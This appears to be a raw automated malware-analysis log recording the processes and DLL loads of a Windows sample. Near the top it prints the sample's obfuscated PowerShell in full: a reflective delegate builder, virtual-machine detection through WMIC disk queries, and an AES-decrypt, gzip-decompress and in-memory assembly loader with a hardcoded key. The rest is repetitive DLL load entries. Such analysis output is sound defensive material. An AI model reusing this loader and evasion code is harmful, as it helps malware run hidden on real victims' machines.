Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+[Char](101)+'c'+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+'e'+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+'eTy'+[Char](112)+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+''+'n'+'s'+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$WLjbMWfHUpI.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+'Na'+[Char](109)+''+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+',Pu'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uwMlljVVwbVUVD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');$WLjbMWfHUpI.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'ubl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+'N'+'ew'+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+[Char](86)+''+'i'+'rt'+'u'+''+[Char](97)+''+[Char](108)+'',$qJfzFIqcrY,$uwMlljVVwbVUVD).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $WLjbMWfHUpI.CreateType();}$ulnmlpDbsuVQN=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+[Char](101)+''+[Char](109)+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+''+'o'+'s'+[Char](111)+'f'+[Char](116)+''+[Char](46)+'Wi'+'n'+'3'+'2'+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+'a'+'t'+'i'+''+[Char](118)+'eM'+[Char](101)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{33f9b6db-472d-4fae-86c7-d938bf69b9c0}
Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{33f9b6db-472d-4fae-86c7-d938bf69b9c0}
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: faultrep.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: faultrep.dll
